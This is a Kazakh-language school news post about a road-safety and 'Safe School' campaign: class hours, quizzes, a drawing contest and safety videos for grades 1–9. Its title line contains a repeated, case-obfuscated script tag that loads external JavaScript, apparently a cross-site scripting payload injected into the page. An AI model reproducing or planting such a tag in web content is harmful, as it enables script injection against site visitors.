"Қауіпсіз мектеп акциясы"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.09.2020

Мамай негізгі мектебі бойынша 2020 жылы 10 тамыздан 25 қыркүйек аралығында «Қауіпсіз мектеп ортасы» республикалық акциясы ұйымдастырылып өткізілді. Жоспарға сәйкес  2-4 сыныбында "Жол тәртібін білейік,аман-есен жүрейік!" атты тәрбие сағаты өткізілді Сабақ барысында әр оқушы ортаға шығып, шеңберге тұрып бір-біріне тілек айтты. 
Ұйымдастыру кезеңі  жұмбақ жасыру арқылы басталды. Жол тәртібі, жол ережелері туралы қысқаша ақпарат берілді. Оқушылар жағдаяттарды шешуге белсене қатысты. Әртүрлі викториналық сұрақтар қойылды/Сынып жетекшісі: Кеңшілік Б./.

    3-сынып оқушыларымен «Жол тәртібін білейік, аман –есен жүрейік» атты сынып сағаты ұйымдастырылп өткізілді. Оқушыларға жол ережелері туралы сұрақтар қойылып, өлеңдер құрастырды. Сонымен қатар, жол белгілерімен жұмыс жасады/ Сынып жетекшісі Ахметкалиева Қ.Ж./

    1-сынып оқушыларымен де «Жол ережелері» тақырыбында сынып сағаты өткізілді. Сабақ барысында оқушыларға түрлі сұрақтар қойылып, жол ережелерімен танысты.

    1-5 сынып оқушылар арасында «Қауіпсіз мектеп» тақырыбында суреттер конкурсы ұйымдастырылып өткізілді. Оқушылар белсене қатысты.

1-9 сынып оқушыларға балалар қауіпсіздігі туралы видеороликтер көрсетілді. 5-9 сынып оқушыларымен көшеде жүру, жолда жүру және үйдегі қауіпсіздігі туралы сынып жетекшілері әңгімелер жүргізді.

Просмотров: 631


Пікір қосу



Деректерді қолтаңбаға қосу